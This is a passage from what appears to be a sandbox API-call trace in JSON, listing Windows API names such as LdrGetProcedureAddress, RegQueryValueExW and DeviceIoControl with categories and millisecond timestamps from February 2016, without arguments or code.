"api": "LdrLoadDll"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,070", "api": "GetSystemMetrics"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,070", "api": "ZwMapViewOfSection"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,080", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrLoadDll"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "SetWindowsHookExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "SetWindowsHookExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:08,080", "api": "NtOpenMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,100", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,100", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetDllHandle"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,100", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LookupPrivilegeValueW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LookupPrivilegeValueW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,120", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,120", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": 